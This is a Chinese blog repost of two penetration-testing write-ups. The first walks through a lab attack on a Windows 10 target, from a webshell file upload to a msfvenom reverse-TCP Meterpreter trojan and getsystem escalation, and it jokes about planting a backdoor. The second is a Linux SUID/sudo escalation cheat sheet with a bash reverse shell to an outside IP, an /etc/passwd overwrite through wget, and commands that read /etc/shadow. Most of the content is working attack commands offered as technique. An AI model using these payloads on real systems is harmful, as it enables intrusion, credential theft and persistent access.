记一次网站攻击到提权的全部过程

Posted BTY@BTY

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了记一次网站攻击到提权的全部过程相关的知识,希望对你有一定的参考价值。

准备

靶机:win10系统(被攻击方)

入侵者:win10系统,kali系统

首先启动win10系统,搭建一个存在漏洞的网站,这里就继续用以前搭建好的网站,映射到局域网,使我们能够正常访问。

在此站点中拿到webshell

文件上传漏洞 

1.选择工具----附件分类管理

2.选择创建资源分类 

(添加支持的附件类型.php) 

 3.选择文件资源管理,并上传文件。

4.文件上传成功,且目录中存在shell文件

 5.使用蚁剑或者菜刀连接

到此,成功连接,拿到webshell 

反弹shell连接

kali制作exe反弹木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f exe -o 123.exe

 

木马上传 

讲做好的exe木马通过连接的webshell进行上传。

上传成功

启动kali中的msf

执行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.130
set lport 4444
exploit

 

运行木马

msf开启监听之后,去蚁剑webshell中执行上传的木马。

运行成功后,回到kali中的msf回连成功,创建会话。

 

 提权

查看所拥有的用户权限

为普通用户权限,在之前的蚁剑中已经知道对方是win10系统,采用windows的载荷攻击

用getsystem提权

直接提权成功

功能测试

查看系统信息

拍照对方电脑桌面状态

结语 

至此,成功拿到system权限,可以干很多很多事情.....当然是首先留后门了!哈哈哈.......

 

 

 

 

 

记一次Linux安全提权总结

前言:人们赞美流星,是因为它燃烧着走完自己的全部路程。

一、初识SUID

1.suid的简介

suid即set user id,是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。
已知的可以用来提权的Linux可执行文件有:
CopyNmap、Vim、find、Bash、More、Less、Nano、cp
比如常用的ping命令。ping需要发送ICMP报文,而这个操作需要发送Raw Socket。在Linux 2.2引入CAPABILITIES前,使用Raw Socket是需要root权限的(当然不是说引入CAPABILITIES就不需要权限了,而是可以通过其他方法解决,这个后说),所以你如果在一些老的系统里ls -al $(which ping),可以发现其权限是-rwsr-xr-x,其中有个s位,这就是suid:

  1. root@linux:# ls -al /bin/ping
  2. -rwsr-xr-x 1 root root 44168 May 7 2021 /bin/ping

设置了s位的程序在运行时,其Effective UID将会设置为这个程序的所有者。比如,/bin/ping这个程序的所有者是root,它设置了s位,那么普通用户在运行ping时其Effective UID就是0,等同于拥有了root权限。

这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:
Real UID 执行该进程的用户实际的UID,谁通过shell运行就是谁
Effective UID 程序实际操作时生效的UID,一般在进程启动时,直接由Real UID复制而来;或者是当进程对应的可执行文件的suid标志位为s时,为该文件的所属用户/组。所以利用suid文件进行提权需要2个前提:文件的所有者是 0 号或其他super user 文件拥有suid权限
在os层面目前常见发行版linux也会对suid的权限进行限制,具体可以参考p神这篇文章 ,把suid的提权简单抽象为一个c代码:

  1. int main(int argc, char* argv[]) {
  2. return system(argv[1]);
  3. }

编译并赋予suid权限:

  1. root@linux:/tmp# gcc suid.c -o suid
  2. root@linux:/tmp# chmod +s suid

2021最新整理网络安全\\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我<一

2./etc/sudoers 语法

  1. root ALL=(ALL) ALL

root 用户可以从 ALL(任何)终端执行,充当ALL(任何)用户,并运行ALL(任何)命令。第一部分指定用户,第二部分指定可充当用户,第三部分指定 sudo 可运行的命令。

touhid ALL= /sbin/poweroff

输入 touchid 的密码,可以 sudo 执行 poweroff 命令。

touhid ALL = (root) NOPASSWD: /usr/bin/find

不输入密码,可以 sudo 执行 find 命令。

这里引入了一个新的概念Effective UID。Linux进程在运行时有三个UID:

Real UID 执行该进程的用户实际的UID

Effective UID 程序实际操作时生效的UID(比如写入文件时,系统会检查这个UID是否有权限)

Saved UID 在高权限用户降权后,保留的其原本UID(本文中不对这个UID进行深入探讨)

通常情况下Effective UID和Real UID相等,所以普通用户不能写入只有UID=0号才可写的/etc/passwd;有suid的程序启动时,Effective UID就等于二进制文件的所有者,此时Real UID就可能和Effective UID不相等了。

有的同学说某某程序只要有suid权限,就可以提权,这个说法其实是不准确的。只有这个程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。

2. 查找具有 SUID 权限位文件

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null``find / -perm -u=s -type f 2>/dev/null``find / -user root -perm -4000 -exec ls -ldb {} ;

也可以使用 sudo -l 命令列出当前用户可执行的命令

二、常见的提权方式

1.Nmap

nmap是一个经典的端口扫描工具,当目标主机存在版本在2.02-5.21之间的nmap且os的版本在上面受影响的范围内或更早就可以尝试使用这种方法进行提权。

nmap --interactive //进入交互模式

nmap -v //查看版本

nmap> !sh sh-3.2# whoami root

Metasploit也有利用SUID Nmap进行提权攻击:
exploit/unix/local/setuid_nmap

nmap提权失败可能出现的原因

nmap在高版本中限制了suid权限

lua脚本中限制了suid权限

新版Linux系统对子进程的suid权限进行了限制

2.Find

如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。

$ find 1sh -exec bash -i >&amp; /dev/tcp/192.168.100.173/5656 0>&amp;1 \\;

3.Vi/Vim

vim是linux下常见的文本编辑器,但是如果vim被配置了suid权限,那么运行时就会获取高权限进而对只有root用户才有权限读写的文件进行操作或获取高权限shell。在vi/vim中按下esc再输入一下内容即可获取到root的shell :

vim.tiny``Press ESC key``:set shell=/bin/sh``:shell

4.bash

bash -p``id

###5.Less/More

Less 和 more 都可以执行提权的shell

less /etc/passwd

!/bin/sh

6.python/perl/ruby/lua/php/etc

python -c "importos;os.system(’/bin/bash’)

7.cp覆盖 /etc/shadow 或 /etc/passwd

8.mv

覆盖 /etc/shadow 或 /etc/passwd

9.其它方式

nano

nano /etc/passwd

awk

awk 'BEGIN {system("/bin/sh")}'

man

man passwd

!/bin/bash

wget

wget http://192.168.56.1:8080/passwd -O /etc/passwd

apache

仅可查看文件,不能弹 shell:

apache2 -f /etc/shadow

tcpdump

echo $'id\\ncat /etc/shadow' > /tmp/.test

chmod +x /tmp/.test

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

python/perl/ruby/lua/php/etc

python

python -c "import os;os.system('/bin/bash')"

perl

exec "/bin/bash";

三、查找SUID权限文件

以下命令可以找到正在系统上运行的所有SUID可执行文件,命令将从 / 目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm ``-4000``-``print``2``>/dev/null``find / -perm -u=s -type f ``2``>/dev/null``find / -user root -perm ``-4000``-exec ls -ldb {} \\;

不同版本下linux的不同输出

Linux发行版输出结果
Ubuntu 14.04uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Ubuntu 16.04uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ubuntu 18.04uid=33(www-data) gid=33(www-data) groups=33(www-data)
CentOS 6uid=33(www-data) gid=33(www-data) groups=33(www-data)
CentOS 8uid=33(www-data) gid=33(www-data) groups=33(www-data)
Debian 6uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Debian 8uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Kali 2019uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ubuntu 16.04的不同之处就在dash目录

下载其中的dash_0.5.8.orig.tar.gzdash_0.5.8-2.1ubuntu2.diff.gz并分别解压,我们可以看到dash 0.5.8的原始代码,和Ubuntu对其做的patch。

我们对原始代码进行patch后,会发现多了一个setprivileged函数:

void setprivileged(int on)
{
    static int is_privileged = 1;
    if (is_privileged == on)
        return;
    is_privileged = on;

    /*
     * To limit bogus system(3) or popen(3) calls in setuid binaries, require
     * -p flag to work in this situation.
     */
    if (!on && (uid != geteuid() || gid != getegid())) {
        setuid(uid);
        setgid(gid);
        /* PS1 might need to be changed accordingly. */
        choose_ps1();
    }
}

on的取值取决于用户是否传入了-p参数, 而uid和gid就是当前进程的Real UID(GID)。可见,在on为false,且Real UID 不等于Effective UID的情况下,这里重新设置了进程的UID:

setuid(uid)

setuid函数用于设置当前进程的Effective UID,如果当前进程是root权限或拥有CAP_SETUID权限,则Real UID和Saved UID将被一起设置。

所以,可以看出,Ubuntu发行版官方对dash进行了修改:当dash以suid权限运行、且没有指定-p选项时,将会丢弃suid权限,恢复当前用户权限。

这样以来,dash在suid的表现上就和bash相同了,这也就解释了为什么在Ubuntu 16.04以后,我们无法直接使用SUID+**system**()的方式来提权。

总结
suid提权是渗透测试种经常遇到的情况,遇见的不同系统、不同环境都会有不同的提权方式,掌握多种提权方式是渗透的必备的。

以上是关于记一次网站攻击到提权的全部过程的主要内容,如果未能解决你的问题,请参考以下文章

记一次Linux安全提权总结

web安全渗透之钓鱼网站提权

记一次CVE漏洞检测过程

从sql注入到内网

什么是电脑内核提权漏洞?

记一次漏洞挖掘网络安全